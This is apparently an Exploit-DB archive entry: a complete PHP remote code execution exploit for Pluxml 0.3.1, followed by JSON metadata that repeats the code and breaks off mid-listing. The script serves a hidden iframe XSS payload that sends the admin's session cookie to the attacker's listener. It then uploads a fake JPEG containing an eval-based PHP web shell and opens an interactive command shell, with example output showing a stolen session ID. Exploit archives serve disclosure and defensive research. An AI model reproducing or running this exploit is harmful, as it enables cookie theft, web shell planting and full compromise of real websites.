<?php
# C:\> sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196
# [/]Waiting for connection on http://90.27.10.196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 182.26.54.2:2007
# [+]Sending 366 bytes to 182.26.54.2:2007
# [+]Received 326 bytes from 182.26.54.2:2009
# [+]Sending 366 bytes to 182.26.54.2:2009
# [+]Received 692 bytes from 182.26.54.2:2010
# [!]Received one cookie from 182.26.54.2:2010
# [/]Verifying if there is a valid session id cookie
# [-]No: pollvote=1
# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b
# [+]The created socket has been shut down
# $shell> whoami
# darkfig
#
if($argc < 5)
{
print("
------------ Pluxml 0.3.1 Remote Code Execution Exploit -------------
---------------------------------------------------------------------
Credits: DarkFig <gmdarkfig@gmail.com>
URL: acid-root.new.fr || mgsdl.free.fr
IRC: #acidroot@irc.worldnet.net
Note: Coded for fun 8)
---------------------------------------------------------------------
Usage: $argv[0] -url <> -ip <> [Options]
Params: -url For example http://victim.com/pluxml0.3.1/
-ip The IP that will be bound to the socket
Options: -port The socket will listen on this port (default=80)
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
---------------------------------------------------------------------
");exit(1);
}
# PhpSploit object
####################
$xpl = new phpsploit();
$xpl->agent('Firefox');
# Server
##########
$server_addr = getparam('ip',1);
$server_port = (getparam('port')!='') ? getparam('port') : '80';
$server_url = "http://$server_addr:$server_port/";
# Victim
##########
$hack = getparam('url',1);
$html = "<h1>hello :)</h1>\n";
# Apparently my XSS bypass NoScript protection
################################################
$xss = "<iframe src='${hack}pluxml/admin/auth.php?msg="
."<script>document.location=(".char($server_url.'?c=')
.".concat(document.cookie))</script>'"
." height=0 width=0>";
# Socket
##########
$handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($handle, $server_addr, $server_port);
socket_listen($handle);
print "\n[/]Waiting for connection on $server_url";
print "\n[!]Now you have to make the victim to click on the url";
# Wait until we get admin rights
##################################
while(TRUE)
{
$packet = '';
if(!$msg = socket_accept($handle))
exit(1);
# End of the packet ?
######################
while(!ereg("\r\n\r\n",$packet))
$packet .= socket_read($msg, 2048, PHP_BINARY_READ);
socket_getpeername($msg, $clientaddr, $clientport);
print "\n[+]Received ".strlen($packet)." bytes from $clientaddr:$clientport";
# Server response
##################
$serv =
"HTTP 1.x 200 OK\r\n"
."Connection: close\r\n"
."Transfer-Encoding: chunked\r\n"
."Content-Type: text/html\r\n\r\n"
.$html.$xss."\r\n\r\n";
# Is there a cookie ?
#######################
if(preg_match("#\?c=(\S*) HTTP/1\.([01x]+)#", $packet, $cookies))
{
print "\n[!]Received one cookie from $clientaddr:$clientport";
print "\n[/]Verifying if there is a valid session id cookie";
$cookie = explode(';%20',$cookies[1]);
foreach($cookie as $session)
{
# Valid session id ?
#######################
if(is_valid_session($session))
# Let's upload a file
#######################
code_execution();
}
print "\n[-]No valid session id cookie found";
print "\n[/]Always waiting for connection";
}
# Answer to the client
########################
else
{
print "\n[+]Sending ".strlen($serv)." bytes to $clientaddr:$clientport";
socket_write($msg, $serv, strlen($serv));
}
socket_close($msg);
}
# Function which is like getopt()
###################################
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param)
return $argv[$value+1];
}
if($opt)
exit("-$param parameter required");
else
return;
}
# Bypass magic_quotes_gpc
###########################
function char($data)
{
$char = 'String.fromCharCode(';
for($i=0;$i<strlen($data);$i++)
{
$char .= ord($data[$i]);
if($i != (strlen($data)-1))
$char .= ',';
}
return $char.')';
}
# Admin session always available ?
###################################
function is_valid_session($session)
{
global $xpl,$hack;
$xpl->addheader('Cookie',$session);
$xpl->get($hack.'pluxml/admin/index.php');
if(eregi('Location: auth.php', $xpl->getheader()))
{
print "\n[-]No: $session";
return FALSE;
}
else
{
print "\n[!]Yes: $session";
return TRUE;
}
}
# File upload vulnerability
#############################
function code_execution()
{
global $xpl,$hack,$msg;
socket_close($msg);
print "\n[+]The created socket has been shut down";
# +images.php [File Upload Vulnerability]
# |
# 11. if(!empty($_FILES)){
# 12. $uploaddir = '../../images/';
# 13. $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
# 14. if(getimagesize($_FILES['userfile']['tmp_name'])){
# 15. move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile);
# 16. chmod($uploadfile, 0777);
# 17. $msg = 'Image envoyĂŠe';
# 18. }else{
# 19. $msg = 'Le fichier n\'est pas une image';
# 20. }
# 21. header('Location: images.php?msg='.$msg);
# 22. }
#
# Fake JPG 1x1
# 000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse
# 000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_
# 000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri
# 000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011
# 000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV
# 000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]);
# 00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678
# 00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\>.
#
$fakejpg =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00"
."\x60\x00\x60\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06"
."\x05\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B"
."\x0C\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20"
."\x24\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31"
."\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF"
."\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D\x0D\x18\x32"
."\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
."\x32\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00\x7F\x3C\x3F\x70"
."\x68\x70\x0D\x0A\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F"
."\x53\x45\x52\x56\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45"
."\x4C\x4C\x5D\x29\x29\x0D\x0A\x7B\x0D\x0A\x70\x72\x69\x6E\x74"
."\x20\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31"
."\x32\x3B\x0D\x0A\x65\x76\x61\x6C\x28\x24\x5F\x53\x45\x52\x56"
."\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45\x4C\x4C\x5D\x29"
."\x3B\x0D\x0A\x70\x72\x69\x6E\x74\x20\x31\x32\x33\x34\x35\x36"
."\x37\x38\x39\x31\x30\x31\x31\x31\x32\x3B\x0D\x0A\x7D\x0D\x0A"
."\x3F\x3E\xFF\xC0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00"
."\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01"
."\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02"
."\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00"
."\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D"
."\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61"
."\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1\x15\x52"
."\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A\x25"
."\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45"
."\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64"
."\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83"
."\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99"
."\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6"
."\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3"
."\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8"
."\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC4\x00"
."\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00"
."\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B"
."\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
."\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31"
."\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91"
."\xA1\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24"
."\x34\xE1\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36"
."\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55"
."\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74"
."\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A"
."\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7"
."\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4"
."\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA"
."\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7"
."\xF8\xF9\xFA\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
."\x3F\x00\xF7\xFA\x28\xA2\x80\x3F\xFF\xD9";
$formdata = array(
frmdt_url => $hack.'pluxml/admin/images.php',
'userfile' => array(
frmdt_filename => 'iwashere.php',
frmdt_content => $fakejpg));
$xpl->formdata($formdata);
print "\n\$shell> ";
while(!preg_match('#^(quit|exit)$#', ($cmd = trim(fgets(STDIN)))))
{
# $shell> cat ../pluxml/conf/password.xml
########################################
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($hack.'images/iwashere.php');
$content = explode('1.23456789101E+014',$xpl->getcontent());
print $content[1]."\n\$shell> ";
}
exit(0);
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 4 / PHP 5
* VERSION: 2.0
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
*
* [2007-06-10] (2.0)
* * Code: Code optimization
* * New: Compatible with PHP 4 by default
*
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit
{
var $proxyhost;
var $proxyport;
var $host;
var $path;
var $port;
var $method;
var $url;
var $packet;
var $proxyuser;
var $proxypass;
var $header;
var $cookie;
var $data;
var $boundary;
var $allowredirection;
var $last_redirection;
var $cookiejar;
var $recv;
var $cookie_str;
var $header_str;
var $server_content;
var $server_header;
/**
* This function is called by the
* get()/post()/formdata() functions.
* You don't have to call it, this is
* the main function.
*
* @access private
* @return string $this->recv ServerResponse
*
*/
function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport))
$socket = @fsockopen($this->proxyhost,$this->proxyport);
else
$socket = @fsockopen($this->host,$this->port);
if(!$socket)
die("Error: Host seems down");
if($this->method=='get')
$this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
elseif($this->method=='post' or $this->method=='formdata')
$this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
else
die("Error: Invalid method");
if(!empty($this->proxyuser))
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
if(!empty($this->header))
$this->packet .= $this->showheader();
if(!empty($this->cookie))
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket))
$this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar)
$this->getcookie();
if($this->allowredirection)
return $this->getredirection();
else
return $this->recv;
}
/**
* This function allows you to add several
* cookies in the request.
*
* @access public
* @param string cookn CookieName
* @param string cookv CookieValue
* @example $this->addcookie('name','value')
*
*/
function addcookie($cookn,$cookv)
{
if(!isset($this->cookie))
$this->cookie = array();
$this->cookie[$cookn] = $cookv;
}
/**
* This function allows you to add several
* headers in the request.
*
* @access public
* @param string headern HeaderName
* @param string headervalue Headervalue
* @example $this->addheader('Client-IP', '128.5.2.3')
*
*/
function addheader($headern,$headervalue)
{
if(!isset($this->header))
$this->header = array();
$this->header[$headern] = $headervalue;
}
/**
* This function allows you to use an
* http proxy server. Several methods
* are supported.
*
* @access public
* @param string proxy ProxyHost
* @param integer proxyp ProxyPort
* @example $this->proxy('localhost',8118)
* @example $this->proxy('localhost:8118')
*
*/
function proxy($proxy,$proxyp='')
{
if(empty($proxyp))
{
$proxarr = explode(':',$proxy);
$this->proxyhost = $proxarr[0];
$this->proxyport = (int)$proxarr[1];
}
else
{
$this->proxyhost = $proxy;
$this->proxyport = (int)$proxyp;
}
if($this->proxyport > 65535)
die("Error: Invalid port number");
}
/**
* This function allows you to use an
* http proxy server which requires a
* basic authentification. Several
* methods are supported:
*
* @access public
* @param string proxyauth ProxyUser
* @param string proxypass ProxyPass
* @example $this->proxyauth('user','pwd')
* @example $this->proxyauth('user:pwd');
*
*/
function proxyauth($proxyauth,$proxypass='')
{
if(empty($proxypass))
{
$posvirg = strpos($proxyauth,':');
$this->proxyuser = substr($proxyauth,0,$posvirg);
$this->proxypass = substr($proxyauth,$posvirg+1);
}
else
{
$this->proxyuser = $proxyauth;
$this->proxypass = $proxypass;
}
}
/**
* This function allows you to set
* the 'User-Agent' header.
*
* @access public
* @param string useragent Agent
* @example $this->agent('Firefox')
*
*/
function agent($useragent)
{
$this->addheader('User-Agent',$useragent);
}
/**
* This function returns the headers
* which will be in the next request.
*
* @access public
* @return string $this->header_str Headers
* @example $this->showheader()
*
*/
function showheader()
{
$this->header_str = '';
if(!isset($this->header))
return;
foreach($this->header as $name => $value)
$this->header_str .= $name.': '.$value."\r\n";
return $this->header_str;
}
/**
* This function returns the cookies
* which will be in the next request.
*
* @access public
* @return string $this->cookie_str Cookies
* @example $this->showcookie()
*
*/
function showcookie()
{
$this->cookie_str = '';
if(!isset($this->cookie))
return;
foreach($this->cookie as $name => $value)
$this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str;
}
/**
* This function returns the last
* formed http request.
*
* @access public
* @return string $this->packet HttpPacket
* @example $this->showlastrequest()
*
*/
function showlastrequest()
{
if(!isset($this->packet))
return;
else
return $this->packet;
}
/**
* This function sends the formed
* http packet with the GET method.
*
* @access public
* @param string url Url
* @return string $this->sock()
* @example $this->get('localhost/index.php?var=x')
* @example $this->get('http://localhost:88/tst.php')
*
*/
function get($url)
{
$this->target($url);
$this->method = 'get';
return $this->sock();
}
/**
* This function sends the formed
* http packet with the POST method.
*
* @access public
* @param string url Url
* @param string data PostData
* @return string $this->sock()
* @example $this->post('http://localhost/','helo=x')
*
*/
function post($url,$data)
{
$this->target($url);
$this->method = 'post';
$this->data = $data;
return $this->sock();
}
/**
* This function sends the formed http
* packet with the POST method using
* the multipart/form-data enctype.
*
* @access public
* @param array array FormDataArray
* @return string $this->sock()
* @example $formdata = array(
* frmdt_url => 'http://localhost/upload.php',
* frmdt_boundary => '123456', # Optional
* 'var' => 'example',
* 'file' => array(
* frmdt_type => 'image/gif', # Optional
* frmdt_transfert => 'binary' # Optional
* frmdt_filename => 'hello.php,
* frmdt_content => '<?php echo 1; ?>'));
* $this->formdata($formdata);
*
*/
function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method = 'formdata';
$this->data = '';
if(!isset($array[frmdt_boundary]))
$this->boundary = 'phpsploit';
else
$this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match('#^frmdt_(boundary|url)#',$key))
{
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type]))
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert]))
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content
* of the server response, without
* the headers.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_content
* @example $this->getcontent()
* @example $this->getcontent($this->get('http://localhost/'))
*
*/
function getcontent($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_content = '';
for($i=1;$i<count($code);$i++)
$this->server_content .= $code[$i];
return $this->server_content;
}
/**
* This function returns the headers
* of the server response, without
* the content.
*
* @access public
* @param string code ServerResponse
* @return string $this->server_header
* @example $this->getcontent()
* @example $this->getcontent($this->post('http://localhost/','1=2'))
*
*/
function getheader($code='')
{
if(empty($code))
$code = $this->recv;
$code = explode("\r\n\r\n",$code);
$this->server_header = $code[0];
return $this->server_header;
}
/**
* This function is called by the
* cookiejar() function. It adds the
* value of the "Set-Cookie" header
* in the "Cookie" header for the
* next request. You don't have to
* call it.
*
* @access private
* @param string code ServerResponse
*
*/
function getcookie()
{
foreach(explode("\r\n",$this->getheader()) as $header)
{
if(preg_match('/set-cookie/i',$header))
{
$fequal = strpos($header,'=');
$fvirgu = strpos($header,';');
// 12=strlen('set-cookie: ')
$cname = substr($header,12,$fequal-12);
$cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
$this->cookie[trim($cname)] = trim($cvalu);
}
}
}
/**
* This function is called by the
* get()/post() functions. You
* don't have to call it.
*
* @access private
* @param string urltarg Url
* @example $this->target('http://localhost/')
*
*/
function target($urltarg)
{
if(!ereg('^http://',$urltarg))
$urltarg = 'http://'.$urltarg;
$urlarr = parse_url($urltarg);
$this->url = 'http://'.$urlarr['host'].$urlarr['path'];
if(isset($urlarr['query']))
$this->url .= '?'.$urlarr['query'];
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
$this->host = $urlarr['host'];
if($this->port != '80')
$this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or empty($urlarr['path']))
die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535)
die("Error: Invalid port number");
}
/**
* If you call this function,
* the script will extract all
* 'Set-Cookie' headers values
* and it will automatically add
* them into the 'Cookie' header
* for all next requests.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->cookiejar(0)
* @example $this->cookiejar(1)
*
*/
function cookiejar($code)
{
if($code=='0')
$this->cookiejar=FALSE;
elseif($code=='1')
$this->cookiejar=TRUE;
}
/**
* If you call this function,
* the script will follow all
* redirections sent by the server.
*
* @access public
* @param integer code 1(enabled) 0(disabled)
* @example $this->allowredirection(0)
* @example $this->allowredirection(1)
*
*/
function allowredirection($code)
{
if($code=='0')
$this->allowredirection=FALSE;
elseif($code=='1')
$this->allowredirection=TRUE;
}
/**
* This function is called if
* allowredirection() is enabled.
* You don't have to call it.
*
* @access private
* @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
* @return string $this->get($this->last_redirection)
* @return string $this->recv;
*
*/
function getredirection()
{
if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
{
$this->last_redirection = trim($codearr[2]);
if(!ereg('://',$this->last_redirection))
return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else
return $this->get($this->last_redirection);
}
else
return $this->recv;
}
/**
* This function allows you
* to reset some parameters.
*
* @access public
* @param string func Param
* @example $this->reset('header')
* @example $this->reset('cookie')
* @example $this->reset()
*
*/
function reset($func='')
{
switch($func)
{
case 'header':
$this->header = array('');
break;
case 'cookie':
$this->cookie = array('');
break;
default:
$this->cookiejar = '';
$this->header = array('');
$this->cookie = array('');
$this->allowredirection = '';
break;
}
}
}
?>
# milw0rm.com [2007-06-24]
{"published": "2007-06-24T00:00:00", "id": "EDB-ID:4096", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "8e1e647195fb8c75a12fd73f61bac65a51109453b8b85c9433b3febb2d3f514e", "description": "Pluxml 0.3.1 Remote Code Execution Exploit. CVE-2007-3432,CVE-2007-3542. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/4096/", "lastseen": "2016-01-31T20:09:01", "edition": 1, "title": "Pluxml 0.3.1 - Remote Code Execution Exploit", "osvdbidlist": ["42420", "38890"], "modified": "2007-06-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": ["CVE-2007-3542", "CVE-2007-3432"], "sourceHref": "https://www.exploit-db.com/download/4096/", "references": [], "reporter": "DarkFig", "sourceData": "<?php\n# C:\\> sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196\n# [/]Waiting for connection on http://90.27.10.196:80/\n# [!]Now you have to make the victim to click on the url\n# [+]Received 395 bytes from 182.26.54.2:2007\n# [+]Sending 366 bytes to 182.26.54.2:2007\n# [+]Received 326 bytes from 182.26.54.2:2009\n# [+]Sending 366 bytes to 182.26.54.2:2009\n# [+]Received 692 bytes from 182.26.54.2:2010\n# [!]Received one cookie from 182.26.54.2:2010\n# [/]Verifying if there is a valid session id cookie\n# [-]No: pollvote=1\n# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b\n# [+]The created socket has been shut down\n# $shell> whoami\n# darkfig\n#\nif($argc < 5)\n{\nprint(\"\n------------ Pluxml 0.3.1 Remote Code Execution Exploit -------------\n---------------------------------------------------------------------\n Credits: DarkFig <gmdarkfig@gmail.com>\n URL: acid-root.new.fr || mgsdl.free.fr\n IRC: #acidroot@irc.worldnet.net\n Note: Coded for fun 8)\n---------------------------------------------------------------------\n Usage: $argv[0] -url <> -ip <> [Options]\n Params: -url For example http://victim.com/pluxml0.3.1/\n -ip The IP that will be bound to the socket\n Options: -port The socket will listen on this port (default=80)\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\n---------------------------------------------------------------------\n\");exit(1);\n}\n\n# PhpSploit object\n####################\n$xpl = new phpsploit();\n$xpl->agent('Firefox');\n\n# Server\n##########\n$server_addr = getparam('ip',1);\n$server_port = (getparam('port')!='') ? getparam('port') : '80';\n$server_url = \"http://$server_addr:$server_port/\";\n\n# Victim\n##########\n$hack = getparam('url',1);\n$html = \"<h1>hello :)</h1>\\n\";\n\n# Apparently my XSS bypass NoScript protection\n################################################\n$xss = \"<iframe src='${hack}pluxml/admin/auth.php?msg=\"\n .\"<script>document.location=(\".char($server_url.'?c=')\n .\".concat(document.cookie))</script>'\"\n .\" height=0 width=0>\";\n\n# Socket\n##########\n$handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\nsocket_bind($handle, $server_addr, $server_port);\nsocket_listen($handle);\n\nprint \"\\n[/]Waiting for connection on $server_url\";\nprint \"\\n[!]Now you have to make the victim to click on the url\";\n\n# Wait until we get admin rights\n##################################\nwhile(TRUE)\n{\n\t$packet = '';\n\t\n\tif(!$msg = socket_accept($handle))\n\t exit(1);\n\n\t# End of the packet ?\n\t######################\n\twhile(!ereg(\"\\r\\n\\r\\n\",$packet))\n\t $packet .= socket_read($msg, 2048, PHP_BINARY_READ);\n\t \n socket_getpeername($msg, $clientaddr, $clientport);\n print \"\\n[+]Received \".strlen($packet).\" bytes from $clientaddr:$clientport\";\n\n\t# Server response\n\t##################\n\t$serv =\n\t \"HTTP 1.x 200 OK\\r\\n\"\n\t.\"Connection: close\\r\\n\"\n\t.\"Transfer-Encoding: chunked\\r\\n\"\n\t.\"Content-Type: text/html\\r\\n\\r\\n\"\n\t.$html.$xss.\"\\r\\n\\r\\n\";\n\n\t# Is there a cookie ?\n\t#######################\n\tif(preg_match(\"#\\?c=(\\S*) HTTP/1\\.([01x]+)#\", $packet, $cookies))\n\t{\n\t\tprint \"\\n[!]Received one cookie from $clientaddr:$clientport\";\n\t\tprint \"\\n[/]Verifying if there is a valid session id cookie\";\n\t\t$cookie = explode(';%20',$cookies[1]);\n\t\t\n\t\tforeach($cookie as $session)\n\t\t{\n\t\t\t# Valid session id ?\n\t\t\t#######################\n\t\t\tif(is_valid_session($session))\n\t\t\t\n\t\t\t # Let's upload a file\n\t\t\t #######################\n\t\t\t code_execution();\n\t\t}\n\t\tprint \"\\n[-]No valid session id cookie found\";\n\t\tprint \"\\n[/]Always waiting for connection\";\n\t}\n\t# Answer to the client\n\t########################\n\telse\n\t{\n\t\tprint \"\\n[+]Sending \".strlen($serv).\" bytes to $clientaddr:$clientport\";\n\t\tsocket_write($msg, $serv, strlen($serv));\n\t}\n\tsocket_close($msg);\n}\n\n# Function which is like getopt()\n###################################\nfunction getparam($param,$opt='')\n{\n\tglobal $argv;\n\t\n\tforeach($argv as $value => $key)\n\t{\n\t\tif($key == '-'.$param)\n\t\t return $argv[$value+1];\n\t}\n\t\n\tif($opt)\n\t exit(\"-$param parameter required\");\n\telse\n\t return;\n}\n\n# Bypass magic_quotes_gpc\n###########################\nfunction char($data)\n{\n\t$char = 'String.fromCharCode(';\n\t\n\tfor($i=0;$i<strlen($data);$i++)\n\t{\n\t\t$char .= ord($data[$i]);\n\t\tif($i != (strlen($data)-1))\n\t\t $char .= ',';\n\t}\n\treturn $char.')';\n}\n\n# Admin session always available ?\n###################################\nfunction is_valid_session($session)\n{\n\tglobal $xpl,$hack;\n\t\n\t$xpl->addheader('Cookie',$session);\n\t$xpl->get($hack.'pluxml/admin/index.php');\n\t\n\tif(eregi('Location: auth.php', $xpl->getheader()))\n\t{\n\t\tprint \"\\n[-]No: $session\";\n\t\treturn FALSE;\n\t}\n\telse\n\t{\n\t\tprint \"\\n[!]Yes: $session\";\n\t\treturn TRUE;\n\t}\n}\n\n# File upload vulnerability\n#############################\nfunction code_execution()\n{\n\tglobal $xpl,$hack,$msg;\n\t\n\tsocket_close($msg);\n\tprint \"\\n[+]The created socket has been shut down\";\n\t\n\t# +images.php [File Upload Vulnerability]\n\t# |\n\t# 11. if(!empty($_FILES)){\n\t# 12. $uploaddir = '../../images/';\n\t# 13. $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);\n\t# 14. if(getimagesize($_FILES['userfile']['tmp_name'])){\n\t# 15.\t move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile);\n\t# 16.\t chmod($uploadfile, 0777);\n\t# 17.\t $msg = 